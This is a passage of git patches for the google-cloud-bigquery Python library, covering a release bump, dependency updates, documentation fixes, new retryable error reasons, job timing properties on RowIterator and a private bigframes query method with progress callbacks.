This PR adds a minor sphinx directive to include inherited members for the job classes, and I've confirmed locally by running the `docsfx` nox job that the inherited members do now get included in the docfx_yaml output. --- docs/reference.rst | 1 + 1 file changed, 1 insertion(+) diff --git a/docs/reference.rst b/docs/reference.rst index 6c00df077..d24a73596 100644 --- a/docs/reference.rst +++ b/docs/reference.rst @@ -22,6 +22,7 @@ Job === .. automodule:: google.cloud.bigquery.job + :inherited-members: .. toctree:: :maxdepth: 2 From 29b854823011d131b322e9fd8356cd307d188aac Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 10:57:43 -0400 Subject: [PATCH 153/202] chore(main): release 3.35.1 (#2245) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index e4574aa7a..374448a5e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.35.1](https://github.com/googleapis/python-bigquery/compare/v3.35.0...v3.35.1) (2025-07-21) + + +### Documentation + +* Specify the inherited-members directive for job classes ([#2244](https://github.com/googleapis/python-bigquery/issues/2244)) ([d207f65](https://github.com/googleapis/python-bigquery/commit/d207f6539b7a4c248a5de5719d7f384abbe20abe)) + ## [3.35.0](https://github.com/googleapis/python-bigquery/compare/v3.34.0...v3.35.0) (2025-07-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 0107ae309..d565bc46e 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. 
-__version__ = "3.35.0" +__version__ = "3.35.1" From d219989f977d9d449e4f06a65ba151f0ab2bd9a1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Sat, 26 Jul 2025 00:09:47 +0200 Subject: [PATCH 154/202] chore(deps): update all dependencies (#2243) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 54b708ca8..e7a02eca5 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5b85a9bfe..4f2c0aff4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,20 +13,20 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.73.1 +grpcio==1.74.0 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 pandas==2.3.1 proto-plus==1.26.1 -pyarrow==20.0.0 +pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.22 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 5c48d707f..e72d2822e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.1 db-dtypes==1.4.3 -google.cloud.bigquery==3.35.0 +google.cloud.bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.3.1 diff --git 
a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 88f725bb4..c9aed9e58 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.10.1 db-dtypes==1.4.3 -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index e43cb04e9..afa62b6b8 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 From 791c53bef3caa672c9b3c5292b4050cd1c62d6e3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 31 Jul 2025 23:54:06 +0200 Subject: [PATCH 155/202] chore(deps): update dependency matplotlib to v3.10.5 (#2251) --- samples/notebooks/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c9aed9e58..a2f0cb44a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -5,5 +5,5 @@ google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.3; python_version >= '3.10' +matplotlib==3.10.5; python_version >= '3.10' pandas==2.3.1 From 8f031666114a826da2ad965f8ecd4727466cb480 Mon Sep 17 00:00:00 2001 From: Dan Lee <71398022+dandhlee@users.noreply.github.com> Date: Tue, 5 Aug 2025 04:41:40 -0400 Subject: [PATCH 156/202] docs: update README to break infinite redirect loop (#2254) --- README.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.rst b/README.rst index 29e15e067..23ed9257d 100644 --- a/README.rst +++ b/README.rst @@ -18,7 +18,7 @@ 
processing power of Google's infrastructure. .. |versions| image:: https://img.shields.io/pypi/pyversions/google-cloud-bigquery.svg :target: https://pypi.org/project/google-cloud-bigquery/ .. _BigQuery: https://cloud.google.com/bigquery/what-is-bigquery -.. _Client Library Documentation: https://googleapis.dev/python/bigquery/latest +.. _Client Library Documentation: https://cloud.google.com/python/docs/reference/bigquery/latest/summary_overview .. _Product Documentation: https://cloud.google.com/bigquery/docs/reference/v2/ Quick Start From abc319b1bf8a11b0013b34001ca2b99caf34790c Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 5 Aug 2025 14:45:23 +0200 Subject: [PATCH 157/202] chore(deps): update all dependencies (#2253) Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com> --- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 4f2c0aff4..fa54cc229 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.7.14 +certifi==2025.8.3 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index e72d2822e..e7230053c 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.10.1 +bigquery_magics==0.10.2 db-dtypes==1.4.3 google.cloud.bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index a2f0cb44a..829f08f47 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.10.1 +bigquery-magics==0.10.2 db-dtypes==1.4.3 google-cloud-bigquery==3.35.1 
google-cloud-bigquery-storage==2.32.0 From 3deff1d963980800e8b79fa3aaf5b712d4fd5062 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 6 Aug 2025 04:50:30 -0500 Subject: [PATCH 158/202] feat: retry query jobs if `jobBackendError` or `jobInternalError` are encountered (#2256) * feat: retry query jobs if `jobBackendError` or `jobInternalError` are encountered * Update google/cloud/bigquery/retry.py --- google/cloud/bigquery/retry.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 999d0e851..8f469f2d3 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -124,6 +124,8 @@ def _should_retry_get_job_conflict(exc): "rateLimitExceeded", "backendError", "internalError", + "jobBackendError", + "jobInternalError", "jobRateLimitExceeded", ) From 0a95b24192395cc3ccf801aa9bc318999873a2bf Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Thu, 14 Aug 2025 15:28:56 -0700 Subject: [PATCH 159/202] feat: add created/started/ended properties to RowIterator. (#2260) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: add created/started/ended attribute to RowIterator. 
* fix annotation * links update * mypy fix * Update google/cloud/bigquery/query.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/table.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/table.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/query.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/query.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/job/query.py Co-authored-by: Tim Sweña (Swast) * fix unit test --------- Co-authored-by: Tim Sweña (Swast) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/_job_helpers.py | 3 ++ google/cloud/bigquery/client.py | 12 +++++++ google/cloud/bigquery/job/query.py | 3 ++ google/cloud/bigquery/query.py | 52 ++++++++++++++++++++++++++- google/cloud/bigquery/table.py | 31 +++++++++++++++- tests/unit/job/test_query.py | 6 ++++ tests/unit/test_client.py | 6 ++++ tests/unit/test_query.py | 48 +++++++++++++++++++++++++ 8 files changed, 159 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 73d4f6e7b..aa0b115d9 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -561,6 +561,9 @@ def do_query(): query=query, total_bytes_processed=query_results.total_bytes_processed, slot_millis=query_results.slot_millis, + created=query_results.created, + started=query_results.started, + ended=query_results.ended, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 804f77ea2..8048452db 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4145,6 +4145,9 @@ def _list_rows_from_query_results( query: Optional[str] = None, total_bytes_processed: Optional[int] = None, slot_millis: Optional[int] = None, + created: Optional[datetime.datetime] = None, + started: Optional[datetime.datetime] = None, + ended: Optional[datetime.datetime] = None, )
-> RowIterator: """List the rows of a completed query. See @@ -4198,6 +4201,12 @@ def _list_rows_from_query_results( total bytes processed from job statistics, if present. slot_millis (Optional[int]): Number of slot ms the user is actually billed for. + created (Optional[datetime.datetime]): + Datetime at which the job was created. + started (Optional[datetime.datetime]): + Datetime at which the job was started. + ended (Optional[datetime.datetime]): + Datetime at which the job finished. Returns: google.cloud.bigquery.table.RowIterator: @@ -4238,6 +4247,9 @@ def _list_rows_from_query_results( query=query, total_bytes_processed=total_bytes_processed, slot_millis=slot_millis, + created=created, + started=started, + ended=ended, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index ec9379ea9..44d8a92e6 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1767,6 +1767,9 @@ def is_job_done(): query=self.query, total_bytes_processed=self.total_bytes_processed, slot_millis=self.slot_millis, + created=self.created, + started=self.started, + ended=self.ended, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 4a006d621..58372f1e6 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1287,7 +1287,7 @@ def slot_millis(self): """Total number of slot ms the user is actually billed for. See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.slot_millis + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.total_slot_ms Returns: Optional[int]: Count generated on the server (None until set by the server). 
@@ -1310,6 +1310,56 @@ def num_dml_affected_rows(self): if num_dml_affected_rows is not None: return int(num_dml_affected_rows) + @property + def created(self): + """Creation time of this query. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.creation_time + + Returns: + Optional[datetime.datetime]: + the creation time (None until set from the server). + """ + millis = self._properties.get("creationTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + + @property + def started(self): + """Start time of this query. + + This field will be present when the query transitions from the + PENDING state to either RUNNING or DONE. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.start_time + + Returns: + Optional[datetime.datetime]: + the start time (None until set from the server). + """ + millis = self._properties.get("startTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + + @property + def ended(self): + """End time of this query. + + This field will be present whenever a query is in the DONE state. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.end_time + + Returns: + Optional[datetime.datetime]: + the end time (None until set from the server). + """ + millis = self._properties.get("endTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + @property def rows(self): """Query results. diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index dbdde36d1..a0986c44e 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1788,7 +1788,15 @@ class RowIterator(HTTPIterator): query (Optional[str]): The query text used. total_bytes_processed (Optional[int]): - total bytes processed from job statistics, if present. 
+ If representing query results, the total bytes processed by the associated query. + slot_millis (Optional[int]): + If representing query results, the number of slot ms billed for the associated query. + created (Optional[datetime.datetime]): + If representing query results, the creation time of the associated query. + started (Optional[datetime.datetime]): + If representing query results, the start time of the associated query. + ended (Optional[datetime.datetime]): + If representing query results, the end time of the associated query. """ def __init__( @@ -1813,6 +1821,9 @@ def __init__( query: Optional[str] = None, total_bytes_processed: Optional[int] = None, slot_millis: Optional[int] = None, + created: Optional[datetime.datetime] = None, + started: Optional[datetime.datetime] = None, + ended: Optional[datetime.datetime] = None, ): super(RowIterator, self).__init__( client, @@ -1843,6 +1854,9 @@ def __init__( self._query = query self._total_bytes_processed = total_bytes_processed self._slot_millis = slot_millis + self._job_created = created + self._job_started = started + self._job_ended = ended @property def _billing_project(self) -> Optional[str]: @@ -1905,6 +1919,21 @@ def slot_millis(self) -> Optional[int]: """Number of slot ms the user is actually billed for.""" return self._slot_millis + @property + def created(self) -> Optional[datetime.datetime]: + """If representing query results, the creation time of the associated query.""" + return self._job_created + + @property + def started(self) -> Optional[datetime.datetime]: + """If representing query results, the start time of the associated query.""" + return self._job_started + + @property + def ended(self) -> Optional[datetime.datetime]: + """If representing query results, the end time of the associated query.""" + return self._job_ended + def _is_almost_completely_cached(self): """Check if all results are completely cached. 
diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 7201adb55..8f684c3e9 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -889,6 +889,9 @@ def test_result_reloads_job_state_until_done(self): job_resource_done = self._make_resource(started=True, ended=True, location="EU") job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) job_resource_done["statistics"]["query"]["totalSlotMs"] = str(5678) + job_resource_done["statistics"]["creationTime"] = str(11) + job_resource_done["statistics"]["startTime"] = str(22) + job_resource_done["statistics"]["endTime"] = str(33) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -971,6 +974,9 @@ def test_result_reloads_job_state_until_done(self): self.assertEqual(result.query, job.query) self.assertEqual(result.total_bytes_processed, 1234) self.assertEqual(result.slot_millis, 5678) + self.assertEqual(result.created.timestamp() * 1000, 11) + self.assertEqual(result.started.timestamp() * 1000, 22) + self.assertEqual(result.ended.timestamp() * 1000, 33) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index bb86ccc3c..c3cf33279 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5719,6 +5719,9 @@ def test_query_and_wait_defaults(self): "queryId": "job_abcDEF_", "totalBytesProcessed": 1234, "totalSlotMs": 5678, + "creationTime": "1437767599006", + "startTime": "1437767600007", + "endTime": "1437767601008", } creds = _make_credentials() http = object() @@ -5737,6 +5740,9 @@ def test_query_and_wait_defaults(self): self.assertEqual(rows.query, query) self.assertEqual(rows.total_bytes_processed, 1234) self.assertEqual(rows.slot_millis, 5678) + self.assertEqual(rows.created.timestamp() * 1000, 1437767599006) + 
self.assertEqual(rows.started.timestamp() * 1000, 1437767600007) + self.assertEqual(rows.ended.timestamp() * 1000, 1437767601008) # Verify the request we send is to jobs.query. conn.api_request.assert_called_once() diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 2b704d3c9..adb43bcd9 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -2016,6 +2016,54 @@ def test_slot_millis_present_string(self): query = self._make_one(resource) self.assertEqual(query.slot_millis, 123456) + def test_created_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.created) + + def test_created_present_integer(self): + resource = self._make_resource() + resource["creationTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.created.timestamp() * 1000, 1437767599006) + + def test_created_present_string(self): + resource = self._make_resource() + resource["creationTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.created.timestamp() * 1000, 1437767599006) + + def test_started_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.started) + + def test_started_present_integer(self): + resource = self._make_resource() + resource["startTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.started.timestamp() * 1000, 1437767599006) + + def test_started_present_string(self): + resource = self._make_resource() + resource["startTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.started.timestamp() * 1000, 1437767599006) + + def test_ended_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.ended) + + def test_ended_present_integer(self): + resource = self._make_resource() + resource["endTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.ended.timestamp() * 1000, 1437767599006) + + def 
test_ended_present_string(self): + resource = self._make_resource() + resource["endTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.ended.timestamp() * 1000, 1437767599006) + def test_num_dml_affected_rows_missing(self): query = self._make_one(self._make_resource()) self.assertIsNone(query.num_dml_affected_rows) From 6659355a57f9393772fb315ec0387ab09630c18a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 18 Aug 2025 10:39:54 -0500 Subject: [PATCH 160/202] chore: add private `_query_and_wait_bigframes` method (#2250) * chore: add private `_query_and_wait_bigframes` method Towards internal issue b/409104302 * fix unit tests * revert type hints * lint * Apply suggestions from code review Co-authored-by: Chalmer Lowe * populate created, started, ended --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_job_helpers.py | 161 +++++++++- google/cloud/bigquery/client.py | 40 ++- google/cloud/bigquery/job/query.py | 6 + google/cloud/bigquery/query.py | 9 +- google/cloud/bigquery/table.py | 3 +- tests/unit/test_client_bigframes.py | 411 ++++++++++++++++++++++++++ 6 files changed, 619 insertions(+), 11 deletions(-) create mode 100644 tests/unit/test_client_bigframes.py diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index aa0b115d9..6fd561f8c 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -35,17 +35,22 @@ predicates where it is safe to generate a new query ID. 
""" +from __future__ import annotations + import copy +import dataclasses +import datetime import functools import uuid import textwrap -from typing import Any, Dict, Optional, TYPE_CHECKING, Union +from typing import Any, Callable, Dict, Optional, TYPE_CHECKING, Union import warnings import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries from google.cloud.bigquery import job +import google.cloud.bigquery.job.query import google.cloud.bigquery.query from google.cloud.bigquery import table import google.cloud.bigquery.retry @@ -116,14 +121,21 @@ def query_jobs_insert( retry: Optional[retries.Retry], timeout: Optional[float], job_retry: Optional[retries.Retry], + *, + callback: Callable = lambda _: None, ) -> job.QueryJob: """Initiate a query using jobs.insert. See: https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + + Args: + callback (Callable): + A callback function used by bigframes to report query progress. """ job_id_given = job_id is not None job_id_save = job_id job_config_save = job_config + query_sent_factory = QuerySentEventFactory() def do_query(): # Make a copy now, so that original doesn't get changed by the process @@ -136,6 +148,16 @@ def do_query(): try: query_job._begin(retry=retry, timeout=timeout) + if job_config is not None and not job_config.dry_run: + callback( + query_sent_factory( + query=query, + billing_project=query_job.project, + location=query_job.location, + job_id=query_job.job_id, + request_id=None, + ) + ) except core_exceptions.Conflict as create_exc: # The thought is if someone is providing their own job IDs and they get # their job ID generation wrong, this could end up returning results for @@ -396,6 +418,7 @@ def query_and_wait( job_retry: Optional[retries.Retry], page_size: Optional[int] = None, max_results: Optional[int] = None, + callback: Callable = lambda _: None, ) -> table.RowIterator: """Run the query, wait for it to finish, and return the results. 
@@ -415,9 +438,8 @@ def query_and_wait( location (Optional[str]): Location where to run the job. Must match the location of the table used in the query as well as the destination table. - project (Optional[str]): - Project ID of the project of where to run the job. Defaults - to the client's project. + project (str): + Project ID of the project of where to run the job. api_timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. @@ -441,6 +463,8 @@ def query_and_wait( request. Non-positive values are ignored. max_results (Optional[int]): The maximum total number of rows from this request. + callback (Callable): + A callback function used by bigframes to report query progress. Returns: google.cloud.bigquery.table.RowIterator: @@ -479,12 +503,14 @@ def query_and_wait( retry=retry, timeout=api_timeout, job_retry=job_retry, + callback=callback, ), api_timeout=api_timeout, wait_timeout=wait_timeout, retry=retry, page_size=page_size, max_results=max_results, + callback=callback, ) path = _to_query_path(project) @@ -496,10 +522,24 @@ def query_and_wait( if client.default_job_creation_mode: request_body["jobCreationMode"] = client.default_job_creation_mode + query_sent_factory = QuerySentEventFactory() + def do_query(): - request_body["requestId"] = make_job_id() + request_id = make_job_id() + request_body["requestId"] = request_id span_attributes = {"path": path} + if "dryRun" not in request_body: + callback( + query_sent_factory( + query=query, + billing_project=project, + location=location, + job_id=None, + request_id=request_id, + ) + ) + # For easier testing, handle the retries ourselves. 
if retry is not None: response = retry(client._call_api)( @@ -542,8 +582,25 @@ def do_query(): retry=retry, page_size=page_size, max_results=max_results, + callback=callback, ) + if "dryRun" not in request_body: + callback( + QueryFinishedEvent( + billing_project=project, + location=query_results.location, + query_id=query_results.query_id, + job_id=query_results.job_id, + total_rows=query_results.total_rows, + total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, + destination=None, + created=query_results.created, + started=query_results.started, + ended=query_results.ended, + ) + ) return table.RowIterator( client=client, api_request=functools.partial(client._call_api, retry, timeout=api_timeout), @@ -614,6 +671,8 @@ def _wait_or_cancel( retry: Optional[retries.Retry], page_size: Optional[int], max_results: Optional[int], + *, + callback: Callable = lambda _: None, ) -> table.RowIterator: """Wait for a job to complete and return the results. @@ -621,12 +680,43 @@ def _wait_or_cancel( the job. 
""" try: - return job.result( + if not job.dry_run: + callback( + QueryReceivedEvent( + billing_project=job.project, + location=job.location, + job_id=job.job_id, + statement_type=job.statement_type, + state=job.state, + query_plan=job.query_plan, + created=job.created, + started=job.started, + ended=job.ended, + ) + ) + query_results = job.result( page_size=page_size, max_results=max_results, retry=retry, timeout=wait_timeout, ) + if not job.dry_run: + callback( + QueryFinishedEvent( + billing_project=job.project, + location=query_results.location, + query_id=query_results.query_id, + job_id=query_results.job_id, + total_rows=query_results.total_rows, + total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, + destination=job.destination, + created=job.created, + started=job.started, + ended=job.ended, + ) + ) + return query_results except Exception: # Attempt to cancel the job since we can't return the results. try: @@ -635,3 +725,62 @@ def _wait_or_cancel( # Don't eat the original exception if cancel fails. 
pass raise + + +@dataclasses.dataclass(frozen=True) +class QueryFinishedEvent: + """Query finished successfully.""" + + billing_project: Optional[str] + location: Optional[str] + query_id: Optional[str] + job_id: Optional[str] + destination: Optional[table.TableReference] + total_rows: Optional[int] + total_bytes_processed: Optional[int] + slot_millis: Optional[int] + created: Optional[datetime.datetime] + started: Optional[datetime.datetime] + ended: Optional[datetime.datetime] + + +@dataclasses.dataclass(frozen=True) +class QueryReceivedEvent: + """Query received and acknowledged by the BigQuery API.""" + + billing_project: Optional[str] + location: Optional[str] + job_id: Optional[str] + statement_type: Optional[str] + state: Optional[str] + query_plan: Optional[list[google.cloud.bigquery.job.query.QueryPlanEntry]] + created: Optional[datetime.datetime] + started: Optional[datetime.datetime] + ended: Optional[datetime.datetime] + + +@dataclasses.dataclass(frozen=True) +class QuerySentEvent: + """Query sent to BigQuery.""" + + query: str + billing_project: Optional[str] + location: Optional[str] + job_id: Optional[str] + request_id: Optional[str] + + +class QueryRetryEvent(QuerySentEvent): + """Query sent another time because the previous attempt failed.""" + + +class QuerySentEventFactory: + """Creates a QuerySentEvent first, then QueryRetryEvent after that.""" + + def __init__(self): + self._event_constructor = QuerySentEvent + + def __call__(self, **kwargs): + result = self._event_constructor(**kwargs) + self._event_constructor = QueryRetryEvent + return result diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8048452db..4ca2cb428 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -15,6 +15,7 @@ """Client for interacting with the Google BigQuery API.""" from __future__ import absolute_import +from __future__ import annotations from __future__ import division from collections import abc as 
collections_abc @@ -31,6 +32,7 @@ import typing from typing import ( Any, + Callable, Dict, IO, Iterable, @@ -3633,8 +3635,8 @@ def query_and_wait( rate-limit-exceeded errors. Passing ``None`` disables job retry. Not all jobs can be retried. page_size (Optional[int]): - The maximum number of rows in each page of results from this - request. Non-positive values are ignored. + The maximum number of rows in each page of results from the + initial jobs.query request. Non-positive values are ignored. max_results (Optional[int]): The maximum total number of rows from this request. @@ -3656,6 +3658,39 @@ def query_and_wait( :class:`~google.cloud.bigquery.job.QueryJobConfig` class. """ + return self._query_and_wait_bigframes( + query, + job_config=job_config, + location=location, + project=project, + api_timeout=api_timeout, + wait_timeout=wait_timeout, + retry=retry, + job_retry=job_retry, + page_size=page_size, + max_results=max_results, + ) + + def _query_and_wait_bigframes( + self, + query, + *, + job_config: Optional[QueryJobConfig] = None, + location: Optional[str] = None, + project: Optional[str] = None, + api_timeout: TimeoutType = DEFAULT_TIMEOUT, + wait_timeout: Union[Optional[float], object] = POLLING_DEFAULT_VALUE, + retry: retries.Retry = DEFAULT_RETRY, + job_retry: retries.Retry = DEFAULT_JOB_RETRY, + page_size: Optional[int] = None, + max_results: Optional[int] = None, + callback: Callable = lambda _: None, + ) -> RowIterator: + """See query_and_wait. + + This method has an extra callback parameter, which is used by bigframes + to create better progress bars. 
+ """ if project is None: project = self.project @@ -3681,6 +3716,7 @@ def query_and_wait( job_retry=job_retry, page_size=page_size, max_results=max_results, + callback=callback, ) def insert_rows( diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 44d8a92e6..b377f979d 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1550,6 +1550,8 @@ def result( # type: ignore # (incompatible with supertype) return _EmptyRowIterator( project=self.project, location=self.location, + schema=self.schema, + total_bytes_processed=self.total_bytes_processed, # Intentionally omit job_id and query_id since this doesn't # actually correspond to a finished query job. ) @@ -1737,7 +1739,11 @@ def is_job_done(): project=self.project, job_id=self.job_id, query_id=self.query_id, + schema=self.schema, num_dml_affected_rows=self._query_results.num_dml_affected_rows, + query=self.query, + total_bytes_processed=self.total_bytes_processed, + slot_millis=self.slot_millis, ) # We know that there's at least 1 row, so only treat the response from diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 58372f1e6..7f70f6a2a 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1228,11 +1228,18 @@ def location(self): See: https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.job_reference + or https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.location Returns: str: Job ID of the query job. """ - return self._properties.get("jobReference", {}).get("location") + location = self._properties.get("jobReference", {}).get("location") + + # Sometimes there's no job, but we still want to get the location + # information. Prefer the value from job for backwards compatibilitity. 
